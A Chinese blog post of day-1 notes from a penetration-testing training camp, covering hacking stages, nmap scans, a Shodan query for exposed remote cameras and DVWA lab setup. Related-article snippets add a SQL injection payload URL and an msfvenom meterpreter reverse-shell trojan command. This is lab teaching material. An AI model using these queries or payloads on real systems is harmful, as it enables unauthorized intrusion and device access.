蓝盾实训营day1——配置渗透环境和SQL注入

最新推荐文章于 2023-09-20 11:32:27 发布
最新推荐文章于 2023-09-20 11:32:27 发布
阅读量818 收藏 6
点赞数
分类专栏: 网络安全 蓝盾十天网络攻防实训营记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mingC0758/article/details/80979173
版权
本文记录了参加蓝盾实训营的第一天,主要涉及配置渗透测试环境和理解SQL注入的过程。介绍了黑客入侵的基本步骤,包括网络设备搜索、Windows服务器扫描和SQL注入的类型与查询技巧。此外,还讨论了PHP转义防御和文件上传漏洞的特征及利用。
摘要由CSDN通过智能技术生成

蓝盾实训营day1——配置渗透环境和SQL注入

有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。

黑客是如何入侵的

  • 踩点
    • whois
  • 扫描
    • nmap
  • 提权
  • 破坏
  • 后门

搜索网络设备

shodan.io

远程摄像头……
搜索jaws/1.0 country:”CN”

windows服务器

  • 不开源
  • 收费

nmap命令

  • nmap -sn 10.21.31.0/24 //扫描局域网
  • nmap -O 10.21.31.0 //扫描单台主机
  • Metasploit 集成漏洞攻击工具

DVMA

渗透测试用的环境

配置

这里写图片描述
编辑config/config.inc.php.dist:
这里写图片描述
配置好数据库账号跟密码。

最低0.47元/天 解锁文章
mingC0758
关注
专栏目录
蓝盾实训营day10——Web渗透实战
mingC0758的博客
07-20 902
扫描 SQL注入 开放了80端口,直接用浏览器访问靶机的网站,发现有SQL注入点: payload http://192.168.188.150/index.php?s=/news/6) and 1=2 union select 1,database(),3,4,5,6,version()-- 最终得到数据库账号密码: 这里用的是base64加密,可以直接解密成明...
搭建SQL注入环境(一)
野原新之助
12-10 1221
环境 HTML代码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>News</title> </head> <body> <form action="news.php" method="get...
SQL注入环境搭建与简单操作
qq_51627527的博客
12-16 676
SQL注入:DVWA+SQLmap+Mysql注入实战 实验环境搭建。启动Metasploitable2虚拟机。
SQL注入—Sqli-labs注入环境搭建》
weixin_47118413的博客
04-06 8352
本文章讲解如何通过Linux(Centos 7)和Windows部署Sqli-labs环境进行sql注入漏洞相关练习,后期会更新关卡教程。
SQL注入sqli-labs环境搭建
Alashan12的博客
03-17 2124
下载phpStudy和sqli压缩包 建议在虚拟机上下载安装,部分版本的phpStudy有后门 解压phpStudy到C盘目录下(虚拟机Windows7) 打开phpStudy.exe 弹出的对话框或页面关闭即可 启动phpStudy,Apache和MySQL显示绿色,若为红色请自行调试 浏览器访问本机地址127.0.0.1 出现phpStudy探针 查看虚拟机IP 宿主机访问虚拟机IP出现phpStudy探针界面 解压sqli到phpStudy...
SQL注入——渗透day06
qq_62716256的博客
08-12 1006
SQL注入——渗透day06
蓝盾实训营day3——文件上传、SQL注入进阶
mingC0758的博客
07-11 1067
cookie欺骗 原理:把登陆后的cookie保存下来,在其他地方访问页面时携带这个cookie.. https可能做不了这个实验 HTTP Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTPS Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTP Cookie ...
蓝盾实训营day7——meterpreter木马生成和利用
mingC0758的博客
07-17 1135
meterpreter木马生成和利用 木马生成 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe &amp;amp;amp;amp;gt; shell.exe lhost 本地ip lport 本地端口 命令完成后,会在当前目录下生成一个...
蓝盾实训营day6——日志查看和木马清除
mingC0758的博客
07-16 975
开启服务器日志和木马清除 开启服务器日志和木马清除 根据应用服务器的不同,有不同的日志开启方法,具体方法直接百度就行,比较简单。开启日志之后,用web扫描工具对网站进行扫描,利用文件上传漏洞进行挂马,然后我们可以查看日志,如果发现有未知页面被客户端访问,则可能发生了挂马行为,查找服务器有没有该木马文件,有就删掉。 apache-php开启日志方法 打开文件: Apa...
探究mssql注入第一课 本地搭建mssql注入环境
07-29
探究mssql注入第一课 本地搭建mssql注入环境
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
搭建SQL注入平台
分享与记录
03-06 3179
1.phpstudy或wamp 二者下载其一,我安装的是phpstudy2018。 2.下载sql-labs sql-labs是一款学习SQL注入的开源平台,共有75种不同类型的注入,这里提供一个我白嫖(滑稽)来的下载地址:https://github.com/Audi-1/sqli-labs 下载完压缩包后并解压到phpstudy2018网站的根目录(我电脑上的路径是L:\phpstudy\P...
SQL注入系列(一)——超详细SQL注入环境搭建
weixin_49058775的博客
08-18 2511
首先准备一台:windows2008 sever 的虚拟机(如果电脑配置较低的,可以开自己本机) Phpstudy2016(个人喜好) 下载chrome浏览器(用google浏览器,存属于个人爱好哈~) https://www.xp.cn/ (phpstudy官方网站啊,不要下载一些带后门哦) 点击windows版 当然虚拟机配置跟不上的,可用本机下载,拖入虚拟机里进行安装 这个phpstudy有多个版...
SQL注入环境搭建和代码编写
Wawyw's Blog
03-07 769
测试环境: Apache2.4 php7.4 MySQL8.0.22 1、PHP + MySQL 通过PHP 可以操作MySQL中的数据,但首先需要解决的问题是PHP如何连接到MySQL? 有以下三种方式: MySQLi (面向对象) MySQLi (面向过程) PDO(PHP Data Objects) 区别在于:PDO 应用在 12 种不同数据库中, MySQLi 只针对 MySQL 数据库。 MySQLi 和 PDO在PHP安装时大多数情况下是自动安装的,可能需要做的是在PHP配置文件 php.
sql注入学习——环境搭建
qq_49502930的博客
10-20 2196
sql注入学习——环境搭建 文章目录sql注入学习——环境搭建一、phpstudy最新版下载安装与注意事项二、sql-labs安装与注意事项三、浏览器登录127.0.0.1\sqli-labs-master总结 一、phpstudy最新版下载安装与注意事项 (1)phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer. (2)是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、
SQL注入之sqli-labs环境搭建
最新发布
weixin_69054284的博客
09-20 2814
往往很多新手在刚学习SQL注入的时候,都需要拥有一个能SQL注入的网站,需要有的。直接去互联网上找的话对新手未免有点太难了,因此:我们一般都是在本地搭建一个能SQL注入测试的网站,那样我们学习SQL注入就容易多了。Sqli-labs是一个印度程序员写的,用来学习的一个游戏教程。
sql注入靶场环境搭建
m0_47555956的博客
10-08 1495
sql注入靶场环境搭建
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5609
SQL注入环境搭建及多种注入类型测试实验
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值